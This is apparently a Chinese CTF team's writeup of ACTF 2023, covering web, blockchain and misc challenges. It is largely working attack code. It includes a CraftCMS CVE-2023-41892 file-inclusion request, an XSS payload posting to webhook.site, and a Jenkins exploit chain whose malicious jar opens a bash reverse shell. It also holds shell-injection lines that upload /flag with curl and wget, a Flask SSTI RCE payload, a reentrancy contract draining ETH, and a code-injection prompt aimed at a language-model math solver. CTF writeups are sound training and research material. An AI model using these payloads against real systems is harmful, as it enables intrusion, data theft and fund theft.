感谢 AAA 的师傅们精心准备的比赛！本次比赛我们 SU 取得了第二名🥈的成绩，感谢队里师傅们的辛苦付出！同时我们也在持续招人，欢迎发送个人简介至：suers_xctf@126.com 或者直接联系书鱼 QQ:381382770。

以下是我们 SU 本次 2023 ACTF的 writeup。

Web

craftcms

和CVE-2023-41892有关

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41892

利用该cve可以完成包含文件的操作。

POST / HTTP/1.1
Host: 61.147.171.105:59935
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 198

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\yii\\rbac\\PhpManager","__construct()":[{"itemFile":"/etc/passwd"}]}}

直接打文件包含+session进度上传。

import io
import requests
import threading

sessid = 'hhhm'

def POST(session):
    f = io.BytesIO(b'a' * 1024 * 50)
    session.post(
        'http://ip/index.php',
        data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php phpinfo();?>"},
        files={"file":('q.txt', f)},
        cookies={'PHPSESSID':sessid}
    )

with requests.session() as session:
    while True:
        POST(session)
        print("[+] 成功写入sess_hhhm")

一边上传一边包含即可：

POST / HTTP/1.1
Host: 61.147.171.105:59935
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 233

action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\yii\\rbac\\PhpManager","__construct()":[{"itemFile":"/tmp/sess_hhhm"}]}}

easy latex

preview路由存在xss

这里可控

可以加载我们的恶意js文件

跟进visit函数

这里是我们的bot机器人
所以这里存在CSRF漏洞，req.parm支持url编码解析，加上preview路由能够让bot触发远程js
/share/%2e%2e%2f%70%72%65%76%69%65%77%3f%74%65%78%3d%68%75%61%68%75%61%26%74%68%65%6d%65%3d%2f%2f%31%32%34%2e%32%32%30%2e%32%31%35%2e%38%3a%37%38%39%30%2f%68%75%61%68%75%61
成功访问到

正好可以加载我们的恶意js文件
在huahua目录下面去写入我们的恶意js文件
bot的cookie里面有flag，但是存在httponly,无法盗取cookie

通过fetch post请求 login 和 vip，获取flag
const loginUrl = '/login';
const vipUrl = '/vip';
const loginCode = 'huahua';

const loginData = new URLSearchParams({
  username: '//webhook.site/2fcfc4a8-99ed-433e-8fa9-bc3e6eaadcb2',
  password: 'ff62b1d5596a16100cc26611d8cb8be1',
});

const fetchOptions = {
  method: 'POST',
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded',
  },
  body: loginData,
};

async function loginAndFetchVip() {
  try {
    const loginResponse = await fetch(loginUrl, fetchOptions);

    if (loginResponse.ok) {
      const vipResponse = await fetch(vipUrl, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded',
        },
        body: new URLSearchParams({ code: loginCode }),
        credentials: 'include',
      });
      // Handle vipResponse here as needed
    } else {
      // Handle loginResponse errors here
    }
  } catch (error) {
    // Handle any fetch-related errors here
    console.error(error);
  }
}

loginAndFetchVip();

接着去加载恶意的js文件
/share/%2e%2e%2f%70%72%65%76%69%65%77%3f%74%65%78%3d%68%75%61%68%75%61%26%74%68%65%6d%65%3d%2f%2f%31%32%34%2e%32%32%30%2e%32%31%35%2e%38%3a%37%38%39%30%2f%68%75%61%68%75%61
成功收到请求

hook

Gateway: http://124.70.33.170:8088/

Intranet jenkins service: http://jenkins:8080/

nginx/1.25.3

解题过程：

https://www.zzwa.org.cn/4553/

https://www.cidersecurity.io/blog/research/how-we-abused-repository-webhooks-to-access-internal-ci-systems-at-scale/

参考上面的利用gitlabs搭配完成攻击内网jenkins的操作。

gitlabs上面部署webhooks，然后让hook去访问http://124.70.33.170:8088/，发现携带了body，导致站点给出方式不支持的错误，但是gitlabs貌似不支持自定义请求格式，所以这里用302跳转去清空请求头，这样访问到页面就是get方式。

这时候站点提示让我携带redirect_url参数，测了好久发现用题干给的http://jenkins:8080/就可以直接访问题目，发现版本号jenkins-2.138，直接打cve：https://aluvion.github.io/2019/02/26/CVE-2019-1003000%E5%A4%8D%E7%8E%B0/

php开302

<?php
header("Location: ".$_GET["redirect_url"]);   
//确保重定向后，后续代码不会被执行   
?>

写恶意jar：

//echo Hhhh123 > META-INF/services/org.codehaus.groovy.plugins.Runners
//javac  Hhhh123.java
//jar cvf poc-1.jar ./Hhhh123.class  ./META-INF/
public class Hhhh123 {
    public Hhhh123(){
        try {
            java.lang.Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/vps/port 0>&1");
        } catch (Exception e) { }

    }
}

name：什么都可以

root：vps ip

group：a即https://x.x.x.x/a目录，group用一次后jar会缓存，所以每次失败都得重新生成。

module、version：恶意jar文件的名字，即module-version.jar

最后形成：http://vpsip:port/hh3/hhhhhh/1/hhhhhh-1.jar

Exp:

http://vps:port/index.php?redirect_url=http%3A%2F%2F124%2E70%2E33%2E170%3A8088%2F%3Fredirect%5Furl%3Dhttp%3A%2F%2Fjenkins%3A8080%2FsecurityRealm%2Fuser%2Fadmin%2FdescriptorByName%2Forg%2Ejenkinsci%2Eplugins%2Eworkflow%2Ecps%2ECpsFlowDefinition%2FcheckScriptCompile%3Fvalue%3D%2520%40GrabConfig%28disableChecksums%3Dtrue%29%250a%2520%40GrabResolver%28name%3D%2527orange%2Etw%2527%2C%2520root%3D%2527http%3A%2F%2F139%2E159%2E197%2E129%3A10003%2F%2527%29%250a%2520%40Grab%28group%3D%2527hh3%2527%2C%2520module%3D%2527hhhhhh%2527%2C%2520version%3D%25271%2527%29%250a%2520import%2520Hhhh123%3B%0A

Ave Mujica’s Masquerade

仔细阅读CVE-2021-42740分析文章https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html

1 2	#!/bin/sh curl -T /flag-???????????????? http://webhook.site/<id>/

1 2	http://<url>/checker?url=127.0.0.1:`:`wget$IFS\webhook.site/<id>/$IFS\-O$IFS/tmp/s.sh``:` http:/<url/checker?url=127.0.0.1:`:`sh$IFS\/tmp/s.sh``:`

mygo

命令注入，简单绕过一些过滤即可。

checker?url=:1%0d-iL%09/flag-????????????????%09-oN%09/dev/stdout

story

需要使得vip为true才能进行后续操作，这里需要generate_code等于session中的vip，generate_code

但似乎没找到python预测随机数的办法，爆破显然实现不了，只找到一个可能的实现方法，如下

https://stackoverflow.com/questions/42646039/how-do-i-predict-the-output-of-pythons-random-number-generator

flask-session不会改变，所以成为一次vip就可以一直使用同一个session

import requests
from story.utils.captcha import Captcha, generate_code

while True:
    headers = {"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
               "Connection": "close", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en", "Accept": "*/*"}

    gen = Captcha(200, 80)
    gen.generate()
    captcha = generate_code()

    requests.get("http://124.70.33.170:23001/captcha", headers=headers)

    rawBody = "{\"captcha\":\"" + captcha + "\"}"
    print(rawBody)
    session = requests.Session()

    headers2 = {"Accept": "*/*",
                "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
                "Connection": "close", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en",
                "Content-Type": "application/json"}
    response = session.post("http://124.70.33.170:23001/vip", data=rawBody, headers=headers2)

    print(session.cookies.items())

带上session/write路由传ssti payload，在/story触发ssti，有个waf

发现SECRET_KEY是写在config里面的，story是从session里面直接获取，直接伪造session即可绕过waf执行ssti rce，所以想办法获取config

waf随机取三条规则，当输入符合这三个规则集其中一条时，返回 False，如果任何一个规则集未被满足，返回 True，不进入下面判断

if not minic_waf(story):
    session['username'] = ""
    session['vip'] = False
    return jsonify({'status': 'error', 'message': 'no way~~~'})

waf规则中有一条不带有config，由于规则抽取的随机性，当三条规则都为rule6时，config将不再触发waf，所以固定session重放获取SECRET_KEY

1	{"story":"{{config}}"}

然后伪造session中story ssti rce

@app.route('/getsession', methods=['GET'])
def getsession():
    session['story']="{{g.pop.__globals__.__builtins__['__import__']('os').popen('cat flag').read()}}"
    return session['story']

Misc

东方原神大学

Viper

题目描述

题目附件

解题思路

这题非常明显地暗示了Viper(Vyper)这一关键词，不难联想到前段时间的Curve的重入攻击事件（事件分析 By ZAN/事件分析 By 零时科技），大致情况是智能合约编程语言Vyper的0.2.15、0.2.16、0.3.0版本编译器存在重入锁故障（即在一笔交易中，两个不同函数的重入锁，并不共享一个锁变量，导致合约可以被跨函数重入攻击）。

将题目合约代码Viper.vy转换为等价的Solidity代码，并删去nonreentrant修饰器函数以便阅读（删去仅是为了方便理解，实际上单函数自身的重入锁是有效的），得到Viper.sol如下：

重入这一攻击类型也是经常接触到的，我在这里就直接给出函数调用路径而不作详细解释了：

我们的目标是**清空题目合约中的ETH余额，初始状态下余额为3 ETH**

构造receive函数，在触发重入效果时执行deposit coins[1]操作：

receive() external payable {
        if (msg.value == 1) {
            uint256 amount = token.balanceOf(address(this));
            target.deposit(1, amount);
        }
    }

调用preSwap函数，使用msg.value=1 ether(ETH is coins[0])兑换得到coins[1]的balances，同时提前approve以便后续transferFrom成功：

function preSwap() external payable {
        target.swap{value: msg.value}(0, 1, msg.value);
        token.approve(address(target), type(uint256).max);
    }

调用hack函数，循环执行4次，每次withdraw所拥有的全部coins[1]，并且将其swap为ETH(coins[0])，同时附带msg.value=1 wei以便重入到receive函数时进行识别，在执行4次循环后我们就有足够的balances[0]来withdraw题目合约上所有的4 ETH(3+1=4)：

function hack() external payable {
        uint256 amount = target.balances(1, address(this));
        for (uint i = 0; i < 4; i++) {
            target.withdraw(1, amount);
            target.swap{value: msg.value}(1, 0, 0);
        }
        target.withdraw(0, address(target).balance);
    }

这样我们便能够在不消耗coins[1]的balances的同时（在重入过程中withdraw又deposit，值没有改变），增加了_after和_before的差值（在_before值记录之前就已经withdraw出来了coins[1]，而_after的增量来自于deposit，这个过程中执行了swapzhi 之外的transferFrom）从而增加我们的balances[0]，跨函数重入利用成功。

以下是攻击合约Farmer.sol和解题脚本solve.py的代码：

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./Viper.sol";

contract Farmer {
    ERC20 token = ERC20(address(0x50155B59Bd8BB2740A62E8E8900dac78E94eA22D));
    Viper target =
        Viper(payable(address(0x0A6FA9c756a4a14EC615F3279cA8549fd3650B5B)));

    function preSwap() external payable {
        target.swap{value: msg.value}(0, 1, msg.value);
        token.approve(address(target), type(uint256).max);
    }

    function hack() external payable {
        uint256 amount = target.balances(1, address(this));
        for (uint i = 0; i < 4; i++) {
            target.withdraw(1, amount);
            target.swap{value: msg.value}(1, 0, 0);
        }
        target.withdraw(0, address(target).balance);
    }

    function getBalance0() external view returns (uint256) {
        return target.balances(0, address(this));
    }

    function getBalance1() external view returns (uint256) {
        return target.balances(1, address(this));
    }

    function isSolved() external view returns (bool) {
        return target.isSolved();
    }

    receive() external payable {
        if (msg.value == 1) {
            uint256 amount = token.balanceOf(address(this));
            target.deposit(1, amount);
        }
    }
}

from Poseidon.Blockchain import *

chain = Chain("http://120.46.58.72:8545")
account = Account(chain, "<PrivateKey>")

abi, bytecode = BlockchainUtils.Compile("Farmer.sol", "Farmer")
contract: Contract = account.DeployContract(abi, bytecode)["Contract"]

contract.ReadOnlyCallFunction("getBalance0")
contract.ReadOnlyCallFunction("getBalance1")
contract.CallFunctionWithParameters(Web3.to_wei(1, 'ether'), None, 1000000, "preSwap")
contract.ReadOnlyCallFunction("getBalance0")
contract.ReadOnlyCallFunction("getBalance1")

contract.CallFunctionWithParameters(1, None, 1000000, "hack")
contract.ReadOnlyCallFunction("isSolved")

得到**flag**为：

1	ACTF{8EW@rE_0F_vEnom0us_sNaK3_81T3$_as_1t_HA$_nO_cOnSc1ENCe}

AMOP1

题目描述

题目附件

解题过程

这题基于**国产联盟链FISCO BCOS构建，主要的知识点是链上信使协议**AMOP (Advanced Messages Onchain Protocol)，题目描述中给了足够多的提示，只需使用现成的工具连接到题目区块链环境并订阅消息即可。

下载并构建交互工具（提前安装好 java 8 或以上版本）：

git clone https://github.com/FISCO-BCOS/java-sdk-demo.git
cd java-sdk-demo
git checkout origin/main-2.0
./gradlew build

之后修改dist/conf/amop/config-subscriber-for-test.toml中的network配置项：

然后将题目附件中的ca.crt、sdk.crt、sdk.key、privkey四个文件移动到dist/conf目录下：

最后分别执行下面两条命令，订阅并获取公共频道(flag1)和私有频道(flag2)的消息：

1
2
3

java -cp 'conf/:lib/*:apps/*' org.fisco.bcos.sdk.demo.amop.tool.AmopSubscriber 'flag1'

java -cp 'conf/:lib/*:apps/*' org.fisco.bcos.sdk.demo.amop.tool.AmopSubscriberPrivateByKey subscribe 'flag2' conf/amop/privkey

拼接后得到**完整flag**为：

1	ACTF{Con5oR7ium_B1ock_cHAiN_sO_INterESt1NG}

AMOP2(非预期未正确解出)

题目描述

题目附件

解题思路

这题在第一题的基础上增加了难度，虽然研究了很久，但由于是初识**FISCO BCOS，对底层原理等深入的内容并不了解，没有正常解出。但推测大致思路是基于中间人攻击 MITM，自行搭建一个中间节点，与题目节点互相建立P2P连接，同时加入联盟链成为观察者节点 Observer，由于AMOP协议会将消息也同步发送给观察者节点，由于消息本身未进行加密，只是多加了一层身份验证，那么这样我们自己的中间节点便可以捕获到消息发送者 Publisher通过AMOP协议发送到私有频道的消息原文，可以借助它完成或绕过身份验证并读到flag**消息。

链上信息传输协议文档：

（以上是比赛时的非预期解结果，我意外解出的原因大概是在我订阅消息的同时出题人恰好运行了他的solve脚本，此时由于证书文件一致或是联盟链身份验证的一些特性，导致我这边也临时通过了身份检验，共享了他的成果，意外地拿到了flag，后续本着实事求是的比赛精神，经过双方联系达成了此次非预期作答不计分的共识。）

以下是出题人赛后提供的solve脚本，本质上是基于文档中私有话题的认证流程部分内容从网络通信层进行中间人攻击，留作参考：

from pwn import *
import abc
import socket
import ssl
from ssl import SSLContext
import json
import requests
context.log_level = 'DEBUG'

# create SSL context
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
context.check_hostname = False
context.load_verify_locations("./conf/ca.crt")
context.load_cert_chain("./conf/sdk.crt", "./conf/sdk.key")
context.set_ecdh_curve("secp256k1")
context.verify_mode = ssl.CERT_REQUIRED

# TARGET_IP = "127.0.0.1"
TARGET_IP = "120.46.58.72"
# TARGET_PORT = 20202 # node2
TARGET_PORT = 41202
# TARGET_RPCPORT = 8547
TARGET_RPCPORT = 48547

PUBLISHER_IP = "127.0.0.1"
PUBLISHER_PORT = 20200  # node1
SUBSCRIBER_IP = "127.0.0.1"
SUBSCRIBER_PORT = 20201

conn = remote(host=TARGET_IP, port=TARGET_PORT, typ="tcp", ssl=True, ssl_context=context, timeout=120)

# let's subscribe a topic here
# which means we need to craft a channel packet
# see class ChannelMessage


def packChannelMsg(type: int, seq: bytes, status: int, payload: bytes):
    # 4 bytes length
    # 2 bytes type
    # 32 bytes seq
    # 4 bytes result
    # then payload
    CHANNEL_HEADER_LENGTH = 42
    result = b""
    result += p32(CHANNEL_HEADER_LENGTH + len(payload), endian="big")
    result += p16(type, endian="big")
    result += seq
    result += p32(status, endian="big")
    result += payload
    return result

##
# 1. fake topices
##


# AMOP_CLIENT_SUBSCRIBE_TOPICS = 50
# packet = packChannelMsg(50, b"\x00" * 32, 0, b'["flag"]')
# coool, but careful, this topic will be set VERIFYING_STATUS
# we also set channel here, we can hear the random UUID now
packet = packChannelMsg(50, b"\x00" * 32, 0, b'["#!$TopicNeedVerify_flag","#!$VerifyChannel_#!$TopicNeedVerify_flag"]')
conn.send(packet)
# wait the topic sync
info("Sleep a while")
time.sleep(3)

##
# 2. leak verify
##
# TODO
# can we do this with channel request instead of RPC request

packet = '{"jsonrpc":"2.0","method":"getPeers","params":[1],"id":1}'
rpcRes = requests.post(f"http://{TARGET_IP}:{TARGET_RPCPORT}", data=packet)
rpcRes = rpcRes.text
rpcResDict = json.loads(rpcRes)
hijackTopic = ""
for peer in rpcResDict["result"]:
    for topic in peer["Topic"]:
        info(f"iterate {topic}")
        if topic.startswith("#!$VerifyChannel_#!$TopicNeedVerify_flag"):
            hijackTopic = topic
            break

if not hijackTopic:
    error("Fail to get topic")
    exit(1)

info(f"Cool we get the hijack topic: {hijackTopic}")
# let's get the random UUID here

# conn.recvuntil(b"#!$VerifyChannel_#!$TopicNeedVerify_flag", drop=True)
# randomuuid = conn.recv(32)
badTopic = b"#!$VerifyChannel_#!$TopicNeedVerify_flag"
requestPacket_1 = conn.recvuntil(badTopic)
info(f"we receive verify request header {requestPacket_1}")

requestPacket_seq = requestPacket_1[-(len(badTopic) + 4 + 1 + 32):-(len(badTopic) + 4 + 1)]
assert (len(requestPacket_seq) == 32)
info(f"we get the seq {requestPacket_seq.hex()}")
randomuuid = conn.recv(32)  # badTopic[randomuuid_idx:]
info(f"Steal the random number: {randomuuid}")

# we need to quickly achieve MITM
# verify_packet = conn.recv()
# info(f"packet with UUID: {verify_packet}")

# let's send a request to see if we can get the answer for this
# and try to fake the reply
# AMOP_REQUEST = 48
conn_hide = remote(host=TARGET_IP, port=TARGET_PORT, ssl=True, ssl_context=context)
target_topic = hijackTopic.encode()  # to bytes
target_payload = bytes([len(target_topic) + 1]) + target_topic + randomuuid
packet = packChannelMsg(48, b"\x00" * 32, 0, target_payload)
conn_hide.send(packet)

# what we will receive here ?
reply = conn_hide.recv()
info(f"hide channel receives: {reply}")
# get the signature here
signature_idx = reply.index(target_topic) + len(target_topic)
signature = reply[signature_idx:]
info(f"hacked signature: {signature.hex()}")

# reply
# AMOP_RESPONSE = 0x31
# be careful with the seq blabla
requestPayload = bytes([len(badTopic) + 1]) + badTopic + signature
reply_packet = packChannelMsg(0x31, requestPacket_seq, 0, requestPayload)

conn.send(reply_packet)

conn.interactive()
conn_hide.interactive()

SLM

先交互爆破

from pwn import *
import hashlib


random_number = "ctd5"

nonce = 0
while True:
    data = random_number + str(nonce)
    h = hashlib.sha256()
    h.update((data).encode())
    bits = "".join(bin(i)[2:].zfill(8) for i in h.digest())
    #print(bits)
    if bits[:22] == "0000000000000000000000":
        break
    nonce += 1
print(f"PoW完成，找到的nonce值为: {nonce}")

本地调试poc

Olivia has $23.then print(open('/flag').read();; She bought five bagels for $3 each.How much money does she have left?

本地验证

log记录

远程超级卡

直接用脚本的多跑几次

from pwn import *
import hashlib

context.log_level="debug"
# 服务器地址和端口
server_address = ('47.113.227.181', 30009)

# 创建一个连接到服务器的连接对象
conn = remote(server_address[0], server_address[1])

conn.recvline()
# 接收UmGd（随机数）从服务器
random_number = conn.recvline().decode().strip()

print(random_number)
random_number=random_number[7:11]
# 尝试不同的整数值，直到找到满足PoW条件的值
nonce = 0
while True:
    data = random_number + str(nonce)
    h = hashlib.sha256()
    h.update((data).encode())
    bits = "".join(bin(i)[2:].zfill(8) for i in h.digest())
    #print(bits)
    if bits[:22] == "0000000000000000000000":
        break
    nonce += 1

# 发送PoW结果给服务器
conn.sendline(str(nonce))
conn.recv()

print(f"PoW完成，找到的nonce值为: {nonce}")

print(conn.recvuntil('>'))
conn.sendline("Olivia has $23.then `print(open('/flag').read();`; She bought five bagels for $3 each.How much money does she have left?")
print(conn.recv())
print(conn.recv())
print(conn.recv())
conn.interactive()

CTFer simulator

一个用TS(JS)写的在线游戏模拟器

https://github.com/morriswmz/phd-game

1	if (t !== i.EndGameState.None) return this._gameState.playerInventory.count("flag") >= 8 && this._gameState.tracer.check(), void(yield this.start(t === i.EndGameState.Winning));

只要flag>8游戏就胜利了，正在思考怎么调

可以用代理拦截重写配置文件增加每次flag获取但是flag为10的时候结束游戏也没有弹出flag

flag数>=8后到达获胜条件之后会触发一个check()函数(正常游玩基本上不可能达到8的)：

会构造一个请求向后端发送请求，传输的数据包括随机数种子，随机数以及用户的行为，如果满足条件应该就可以拿到flag了，请求包格式为：

POST /api/verify HTTP/1.1
Host: http://120.46.65.156:23000/
Referer: http://120.46.65.156:23000/static/
Content-Type: application/json
Accept: application/json
Content-Length: 1031

{
    "randomseed": "9099412735381858",
    "randoms":[0.5140692999120802,0.3860794377978891,0.7347333114594221,0.3968554774764925,0.8094464894384146,0.8490356937982142,0.39441126654855907,0.8459157436154783,0.16993460129015148,0.9875658398959786,0.3602522125001997,0.839919890044257,0.22587694227695465,0.57798264734447,0.1990677216090262,0.022076266119256616,0.04661894147284329,0.8104400581214577,0.5792863611131907,0.9961340674199164,0.03275181073695421,0.9454671153798699,0.8649262373801321,0.9651431469246745,0.8917619856074452,0.4506879821419716,0.047111596213653684,0.14828399359248579,0.5607137372717261,0.452212214237079,0.5840967365074903,0.7207855097949505,0.7038476958405226,0.5140720165800303,0.08320645405910909,0.291031195782125],
    "traces": [
["event",["flagCheck",[]]],
["event",["flagCheck",[]]],
["event",["flagCheck",[]]],
["event",["flagCheck",[]]],
["event",["flagCheck",[]]],
["event",["flagCheck",[]]],
["event",["flagCheck",[]]],
["event",["flagCheck",[]]],
["event",["flagCheck",[]]]
]
}

现在在思考怎么构造

可以用#init_seed= 来控制随机数的seed 用的seedrandom的alea方法生成随机数

游戏共48小时有48次机会

复习使用一次

考试会跳过1h

一次flag流程：

insight->draft->tuned->submit共用4次

每小时降低10点精力

考试额外降10点

提交flag恢复10点

goodinsight恢复10点

可以规划出一个需要最少休息的路线并控制prng使其实现

写了一个爆破种子的脚本

var seedrandom = require('seedrandom');

var seed = 5;
var numberOfTries = 0;

while (true) {
    seed++;
    var found = true;
    var random = seedrandom.alea(seed.toString());
    for (var i = 0; i < 50; i++) {
        var r = random();

        if (r >= 0.5) {
            found = false;
            break;
        }
    }

    if (found) {
        console.log(`Seed found: ${seed}`);
        break;
    }

    numberOfTries++;
    if (numberOfTries % 100000 === 0) {
        console.log(`Tried ${numberOfTries} seeds...`);
    }
}

30个0.6以下的随机数:3830475

35个0.6以下的seed #init_seed=44702381 用这个随便打了一下能打到7个flag 我觉得这个种子优化一下操作肯定能出

唉傻逼了改获取flag没法通过校验但是可以改用户的体力

把这个events.yaml的返回包抓了，这个是配置文件，改成：

---
- id: Init
  trigger: Initialization
  once: true
  actions:
    - id: UpdateVariableLimits
      updates:
        player.energy: [0, 10000]
    - id: UpdateVariables
      updates:
        elapsedHour: 0
        hour: 8
        day: 1
        player.energy: 10000
        player.examLevel: 0
        player.hourSkipped: 0
# Game tick loop
- id: GameTick
  trigger: Tick
  actions:
    - id: UpdateVariables
      updates:
        elapsedHour: elapsedHour + 1
        hour: (hour % 24) + 1
        day: floor((elapsedHour + 9) / 24) + 1
    - id: TriggerEvents
      triggers:
        - id: HourBegin
# Game begin event
- id: TheBeginning
  trigger: HourBegin
  once: true
  actions:
    - id: DisplayChoices
      message: message.beginning
      choices:
        - message: message.acceptCTF
          actions:
            - id: DisplayMessage
              message: message.acceptedCTF
              confirm: message.excited
            - id: DisplayMessage
              message: message.examNotice
              confirm: message.ok
            - id: SetStatus
              statusId: freshness
              on: true
        - message: message.declineCTF
          actions:
            - id: EndGame
              message: message.declinedCTF
              confirm: message.restartNewTimeline
              winning: true
      confirm: message.excited
  
- id: HourSkipUpdate
  trigger: HourBegin
  actions:
  - id: UpdateVariables
    updates:
      player.hourSkipped: max(player.hourSkipped - 1, 0)
# Energy
# -10 for day time
- id: EneryUpdateDayTime
  trigger: HourBegin
  conditions:
  - id: Expression
    expression: elapsedHour > 1 && hour >= 7 && hour < 23 && player.hourSkipped === 0
  actions:
  - id: UpdateVariables
    updates:
      player.energy: player.energy - 10
# -20 for night time
- id: EneryUpdateNightTime
  trigger: HourBegin
  conditions:
  - id: Expression
    expression: elapsedHour > 1 && (hour < 7 || hour >= 23) && player.hourSkipped === 0
  actions:
  - id: UpdateVariables
    updates:
      player.energy: player.energy - 20
# may have addition energy change
- id: EneryUpdateEffective
  trigger: HourBegin
  conditions:
  - id: Expression
    expression: elapsedHour > 1 && player.hourSkipped === 0
  actions:
  - id: UpdateVariables
    updates:
      player.energy: player.energy + calcEffectValue('player.energyBoost', 0)
- id: LostAllEnergy
  trigger: HourBegin
  conditions:
    - id: Expression
      expression: player.energy <= 0
  actions:
    - id: EndGame
      message: message.lostAllEnergy
      confirm: message.restart
      winning: false
# exam event
- id: Qualify
  trigger: HourBegin
  once: true
  conditions:
    - id: Expression
      # 19:00 pm - 8:00 = 11
      expression: elapsedHour === 11
  actions:
    - id: CoinFlip
      probability: player.examLevel * 0.25
      success:
        - id: DisplayMessage
          message: message.examPassed
          confirm: message.great
        - id: UpdateVariables
          updates:
            # exam is tired for sure
            player.energy: player.energy - 10
            player.hourSkipped: 1
      fail:
        - id: EndGame
          winning: false
          message: message.examFailed
          confirm: message.restart

# main choices
# insight -> draft exploit -> tuned exploit -> submitted flag
- id: HourBeginTasks
  trigger: HourBegin
  conditions:
    - id: Expression
      expression: player.hourSkipped === 0
  actions:
    - id: DisplayChoices
      message: message.newHour
      choices:
        - message: message.studyExam
          requirement: elapsedHour < 11
          actions:
            - id: UpdateVariables
              updates:
                player.examLevel: player.examLevel + 1
                # study is tired
                player.energy: player.energy - 10
            - id: Switch
              branches:
                - condition: player.examLevel < 4
                  actions:
                    - id: DisplayMessage
                      message: message.examLevelUp
                      confirm: message.great
                - condition: 1
                  actions:
                    - id: DisplayMessage
                      message: message.examLevelMax
                      confirm: message.great
        - message: message.tryCTF
          requirement: elapsedHour <= 48
          actions:
            - id: CoinFlip
              # TODO
              # 1. if the player is energetic, possibly
              # 2. if the player try many times, possibly
              probability: 0.60
              success:
                - id: GiveItem
                  itemId: insight
                  amount: 1
                - id: DisplayRandomMessage
                  messages:
                    - message.gainInsight1
                    - message.gainInsight2
                  confirm: message.great
                # good insight is encouraing
                - id: CoinFlip
                  probability: 0.2
                  success:
                    - id: DisplayMessage
                      message: message.goodInsight
                      confirm: message.encouraging
                    - id: UpdateVariables
                      updates:
                        player.energy: player.energy + 10
              fail:
                - id: DisplayRandomMessage
                  messages:
                    - message.noInsight1
                    - message.noInsight2
                  confirm: message.oops
                # dis-encouraging
                - id: UpdateVariable
                  variable: player.energy
                  value: player.energy - 5
        - message: message.workOnInsight
          requirement: itemCount('insight') > 0 && elapsedHour <= 48
          actions:
            - id: CoinFlip
              # same, energy and try time
              # most insight should gets to exploit
              probability: 0.8
              success:
                - id: DisplayMessage
                  message: message.gainDraftExp
                  confirm: message.soundsInteresting
                - id: GiveItem
                  itemId: draftExp
                  amount: 1
              fail:
                - id: DisplayRandomMessage
                  messages:
                    - message.badInsight1
                    - message.badInsight2
                    - message.badInsight3
                  confirm: message.unfortunate
            - id: GiveItem
              itemId: insight
              amount: -1
        - message: message.workOnDraftExp
          requirement: itemCount('draftExp') > 0 && elapsedHour <= 48
          actions:
            - id: CoinFlip
              # same, energy and try time
              probability: 0.7
              success:
                - id: DisplayMessage
                  message: message.gainTunedExp
                  confirm: message.soundsInteresting
                - id: UpdateItemAmounts
                  updates:
                    draftExp: -1
                    tunedExp: 1
              fail:
                - id: DisplayRandomMessage
                  messages:
                    - message.noTunedExp1
                    - message.noTunedExp2
                  confirm: message.unfortunate
                - id: UpdateVariable
                  variable: player.energy
                  value: player.energy - 5
        - message: message.workTunedExp
          requirement: itemCount('tunedExp') > 0 && elapsedHour <= 48
          actions:
            - id: CoinFlip
              # same, energy and try time, and flag (more flag then harder)
              probability: 0.7
              success:
                - id: DisplayMessage
                  message: message.gainFlag
                  confirm: message.great
                - id: UpdateItemAmounts
                  updates:
                    submittedFlag: 1
                    tunedExp: -1
              fail:
                - id: DisplayRandomMessage
                  messages:
                    - message.noflag1
                    - message.noflag2
                    - message.noflag3
                  confirm: message.damn
                - id: UpdateVariables
                  updates:
                    player.energy: player.energy - 5
        - message: message.resubmitFlag
          requirement: itemCount('wrongFlag') > 0 && elapsedHour < 48
          actions:
            - id: DisplayMessage
              message: message.resubmitComplete
              confirm: message.hopeAccepted
            - id: UpdateItemAmounts
              updates:
                resubmittedFlag: 1
                wrongFlag: -1
        # day time -> slack off
        - message: message.slackOff
          requirement: "hour < 23 && hour >= 7"
          actions:
            # random decide bonus energy
            - id: Random
              groups:
                - weight: 1
                  actions:
                    - id: DisplayRandomMessage
                      messages:
                        - message.caughtSlackOff1
                        - message.caughtSlackOff2
                      confirm: message.oops
                - weight: 2
                  actions:
                    - id: DisplayMessage
                      message: message.slackOffSuccess
                      confirm: message.great
                    - id: UpdateVariable
                      variable: player.energy
                      value: player.energy + 5
            - id: UpdateVariables
              updates:
                player.energy: player.energy + 35
            - id: SetStatus
              statusId: exhaustion
              on: false
        # night time -> sleep
        - message: message.nap
          requirement: "!(hour < 23 && hour >= 7)"
          actions:
          - id: DisplayMessage
            message: message.napSuccess
            confirm: message.great
          - id: UpdateVariables
            updates:
              player.energy: 100
              player.hourSkipped: 3
          - id: SetStatus
            statusId: exhaustion
            on: false

# flag check events
- id: flagCheck
  trigger: HourBegin
  conditions:
    - id: Expression
      expression: itemCount('submittedFlag') >= 1
  actions:
    - id: CoinFlip
      probability: 0.6
      success:
        - id: DisplayMessage
          message: message.flagAccepted
          confirm: message.bravo
        - id: UpdateItemAmounts
          updates:
            submittedFlag: -1
            flag: 1
        - id: UpdateVariables
          updates:
            player.energy: player.energy + 10
        - id: CoinFlip
          probability: 0.5 - (elapsedHour / 48)
          success:
            - id: DisplayMessage
              message: message.firstblood
              confirm: message.encouraging
            - id: SetStatus
              statusId: firstblood
              on: true
      fail:
        - id: DisplayRandomMessage
          messages:
            - message.flagRejected1
            - message.flagRejected2
          confirm: message.unfortunate
        - id: UpdateItemAmounts
          updates:
            submittedFlag: -1
            wrongFlag: 1
        - id: UpdateVariable
          variable: player.energy
